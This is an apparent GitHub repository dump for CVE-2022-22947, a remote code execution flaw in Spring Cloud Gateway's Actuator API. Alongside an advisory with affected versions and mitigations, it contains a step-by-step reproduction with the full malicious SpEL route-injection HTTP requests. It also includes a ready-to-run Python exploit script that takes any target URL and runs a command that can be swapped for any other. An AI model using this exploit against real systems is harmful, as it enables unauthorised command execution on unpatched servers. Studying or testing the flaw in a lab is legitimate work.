[
  {
    "path": "README.md",
    "content": "# Spring-Cloud-Gateway-CVE-2022-22947\n\n\nSpring Cloud Gateway远程代码执行漏洞的安全公告。该漏洞为当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时，使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求，从而远程执行任意代码。\n\n【受影响版本】\n\nSpring Cloud Gateway < 3.1.1\nSpring Cloud Gateway < 3.0.7\nSpring Cloud Gateway 旧的、不受支持的版本也会受到影响\n【安全版本】\n\nSpring Cloud Gateway >= 3.1.1\nSpring Cloud Gateway >= 3.0.7\n\n\nSpring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关，它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。\n\n\n\n修复建议\n临时修复建议：\n\n如果不需要网关执行器端点，则应通过 management.endpoint.gateway.enabled: false 禁用它。如果需要执行器，则应使用 Spring Security 对其进行保护，请参阅https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security。\n\n通用修复建议：\n\n官方已发布安全版本，请及时下载更新，下载地址：https://github.com/spring-cloud/spring-cloud-gateway\n\n## \n通过url进行攻击\n\n\n\n使用python3 运行\n\n<img width=\"831\" alt=\"image\" src=\"https://user-images.githubusercontent.com/59011386/156518437-ee1cbd8c-133a-4b4b-97af-8c0df6ab6538.png\">\n\n\npython3 \n\n<img width=\"799\" alt=\"image\" src=\"https://user-images.githubusercontent.com/59011386/156515667-64f5c639-7a78-43c6-8414-18631f9c5272.png\">\n\n# 本网站所提供的信息，只供参考之用\n\n"
  },
  {
    "path": "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）.md",
    "content": "# Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）\n\nSpring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（包含）以前存在一处SpEL表达式注入漏洞，当攻击者可以访问Actuator API的情况下，将可以利用该漏洞执行任意命令。\n\n参考链接：\n\n- https://tanzu.vmware.com/security/cve-2022-22947\n- https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/\n\n## 漏洞环境\n\n执行如下命令启动一个使用了Spring Cloud Gateway 3.1.0的Web服务：\n\n```\ndocker-compose up -d\n```\n\n服务启动后，访问`http://your-ip:8080`即可看到演示页面，这个页面的上游就是example.com。\n\n## 漏洞复现\n\n利用这个漏洞需要分多步。\n\n首先，发送如下数据包即可添加一个包含恶意SpEL表达式的路由：\n\n```\nPOST /actuator/gateway/routes/hacktest HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nContent-Type: application/json\nContent-Length: 328\n\n{\n  \"id\": \"hacktest\",\n  \"filters\": [{\n    \"name\": \"AddResponseHeader\",\n    \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"id\\\"}).getInputStream()))}\"}\n  }],\n\"uri\": \"http://example.com\",\n\"order\": 0\n}\n```\n\n[![img](https://github.com/vulhub/vulhub/raw/master/spring/CVE-2022-22947/1.png)](https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/1.png)\n\n然后，发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行：\n\n```\nPOST /actuator/gateway/refresh HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n```\n\n[![img](https://github.com/vulhub/vulhub/raw/master/spring/CVE-2022-22947/2.png)](https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/2.png)\n\n发送如下数据包即可查看执行结果：\n\n```\nGET /actuator/gateway/routes/hacktest HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n```\n\n[![img](https://github.com/vulhub/vulhub/raw/master/spring/CVE-2022-22947/3.png)](https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/3.png)\n\n最后，发送如下数据包清理现场，删除所添加的路由：\n\n```\nDELETE /actuator/gateway/routes/hacktest HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\n```\n\n[![img](https://github.com/vulhub/vulhub/raw/master/spring/CVE-2022-22947/4.png)](https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/4.png)"
  },
  {
    "path": "spring_cloud_RCE.py",
    "content": "import requests\nimport json\nimport sys\n\n\ndef exec(url):\n\n    headers1 = {\n        'Accept-Encoding': 'gzip, deflate',\n        'Accept': '*/*',\n        'Accept-Language': 'en',\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',\n        'Content-Type': 'application/json'\n    }\n\n    headers2 = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',\n        'Content-Type': 'application/x-www-form-urlencoded'\n    }\n\n    ## command to execute replace \"id\" in payload\n\n    payload = '''{\\r\n      \"id\": \"hacktest\",\\r\n      \"filters\": [{\\r\n        \"name\": \"AddResponseHeader\",\\r\n        \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\\\"id\\\\\"}).getInputStream()))}\"}\\r\n        }],\\r\n      \"uri\": \"http://example.com\",\\r\n      \"order\": 0\\r\n    }'''\n\n   \n\n    \n    re1 = requests.post(url=url + \"/actuator/gateway/routes/hacktest\",data=payload,headers=headers1,json=json)\n    re2 = requests.post(url=url + \"/actuator/gateway/refresh\" ,headers=headers2)\n    re3 = requests.get(url=url + \"/actuator/gateway/routes/hacktest\",headers=headers2)\n    re4 = requests.delete(url=url + \"/actuator/gateway/routes/hacktest\",headers=headers2)\n    re5 = requests.post(url=url + \"/actuator/gateway/refresh\" ,headers=headers2)\n    print(re3.text)\n\n\nif __name__ == \"__main__\":\n  print('''   ██████  ██      ██ ████████        ████   ████   ████   ████         ████   ████   ████     ██  ██████\n  ██░░░░██░██     ░██░██░░░░░        █░░░ █ █░░░██ █░░░ █ █░░░ █       █░░░ █ █░░░ █ █░░░ █   █░█ ░░░░░░█\n ██    ░░ ░██     ░██░██            ░    ░█░█  █░█░    ░█░    ░█      ░    ░█░    ░█░█   ░█  █ ░█      ░█\n░██       ░░██    ██ ░███████  █████   ███ ░█ █ ░█   ███    ███  █████   ███    ███ ░ ████  ██████     █ \n░██        ░░██  ██  ░██░░░░  ░░░░░   █░░  ░██  ░█  █░░    █░░  ░░░░░   █░░    █░░   ░░░█  ░░░░░█     █  \n░░██    ██  ░░████   ░██             █     ░█   ░█ █      █            █      █        █       ░█    █   \n ░░██████    ░░██    ░████████      ░██████░ ████ ░██████░██████      ░██████░██████  █        ░█   █    \n  ░░░░░░      ░░     ░░░░░░░░       ░░░░░░  ░░░░  ░░░░░░ ░░░░░░       ░░░░░░ ░░░░░░  ░         ░   ░     \n\n\n\n ██                   ██                 ██                              \n░██       ██   ██    ░██                ░██                              \n░██      ░░██ ██     ░██ ██   ██  █████ ░██  ██  ██████  ███████   █████ \n░██████   ░░███      ░██░██  ░██ ██░░░██░██ ██  ██░░░░██░░██░░░██ ██░░░██\n░██░░░██   ░██    ██ ░██░██  ░██░██  ░░ ░████  ░██   ░██ ░██  ░██░███████\n░██  ░██   ██    ░░  ░██░██  ░██░██   ██░██░██ ░██   ░██ ░██  ░██░██░░░░ \n░██████   ██      ██ ███░░██████░░█████ ░██░░██░░██████  ███  ░██░░██████\n░░░░░    ░░      ░░ ░░░  ░░░░░░  ░░░░░  ░░  ░░  ░░░░░░  ░░░   ░░  ░░░░░░ \n\nusage: python3 test.py url\n''')\n  if(len(sys.argv)>1):\n    url = sys.argv[1]\n    exec(url)\n  else:\n    exit()\n"
  }
]